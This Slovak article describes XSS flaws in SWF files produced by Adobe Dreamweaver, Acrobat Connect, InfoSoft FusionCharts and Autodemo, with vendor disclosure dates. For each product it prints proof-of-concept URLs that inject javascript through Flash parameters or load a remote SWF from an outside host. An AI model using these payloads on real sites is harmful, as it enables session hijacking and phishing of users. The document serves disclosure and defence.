XSS zraniteľnosti v Shockwave Flash súboroch

Kritické zraniteľnosti sú do veľkej miery obsiahnuté používaním publikačných nástrojov (avšak tento problém sa nevsťahuje výhradne na tieto nástroje), ktoré automaticky generujú Shockwave Flash (swf) súbory, ako napríklad Adobe Dreamweaver, Adobe Contribute, Adobe Acrobat Connect, InfoSoft FusionCharts alebo Techsmith Camtasia.A práve webové stránky, ktoré zakladajú na vytváraní swf súborov, sú náchylné k Cross-Site Scriptingu.

XSS

Ako už všetci isto vieme, Cross-site scripting je útok na úživateľa pomocou webovej aplikácie.Ak je webová aplikácia zraniteľná na XSS a útočník naláka užívateľa kliknúť na odkaz k nakazenej webovej aplikácií, potom útočník môže získať úplnú kontrolu nad užívateľským session.Útočník môže vykonať hocijakú JavaScriptovú operáciu vo svoj prospech (napríklad online transakcia v bankovom systéme alebo aj zmena cesty k webstránke (uplatnenie phisingu)).

XSS swf zraniteľnosti

Nanešťastie tieto xss bugy sú vcelku bežnou záležitosťou.Mnoho publikačných nástrojov, ktoré automaticky vytváraju (generujú) swf, vkladajú identický a samozrejme zraniteľný ActionScript do všetkých uložených swf alebo do všetkých kontrolných swf ("save as SWF", "export to SWF", atd.).

Adobe Dreamweaver

"skinName" parameter je akceptovaný Flashovými súbormi vytvorenými pomocou funkcie "Insert Flash Video"."skinName" môže byť použitý k donúteniu obete načítať ľubovoľné URL a to aj vrátane "asfunction" spracovania protokolu:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Táto záležitosť bola fixnutá v Decembrovom Flash Player release.Navyše, útočník taktiež môže pomocou "skinName" pritlačiť obeť k múru a aplikovať na ňu ľubovoľné SWF vedúce k Cross Site Flashingu (XSF) a XSS útokom:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil
Oprava bola prevedená v Januáry.Vid Adobe report (Adobe bol kontaktovaný 8. Augusta 8007).

Adobe Acrobat Connect (vrátane Macromedia Breeze)

"main.swf" je kontrolór súborov vo všetkých Connect/Breeze online prezentáciách.Tento SWF je nevhodne schvaľovaný "baseurl" parametrom.Takto pôsobý script injection:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Toto bolo taktiež opravené v Decembrovom release.Útočník môže použiť "baseurl" za účelom donútenia obete a následovné načítanie ľubovoľného SWF ústiaceho do XSF alebo XSS:

http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
Adobe bol kontaktovaný 31. Júla 2007, Adobe report.

InfoSoft FusionCharts

Jedna z týchto záležitostí bola nájdená aj v FusionCharts, konkrétne parameter "dataURL" umožňuje svojvoľné vkladanie HTML do "TextArea".Toto umožňuje útočníkom nahrávať SWF z ostatných domén:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E
InfoSoft bol s týmto oboznámený 2. Septembra 2007.Release bol vydaný niekedy na konci Septembra.

Autodemo

Autodemo je servisní poskytovaeľ, no nie publikačných nástrojov.Avšak, tak ako publikačné nástroje, aj oni používajú bežné kontrolné súbory v demách."onend" parameter v "control.swf" nahráva ľubovoľné URL vrátane JavaScriptového protokol handleru:

http://www.example.com/control.swf?onend=javascript:alert(1)//
Autodemo bol kontaktovaný 17. Augusta 2007.Fixáciu sme mohli vidieť už v Auguste. Autodemo avšak nieje jediným servisným providerom, ktorý obsahoval XSS vo svojich produktoch, veľké množstvo z nich ani len netušilo, že ich SWF sú zraniteľné.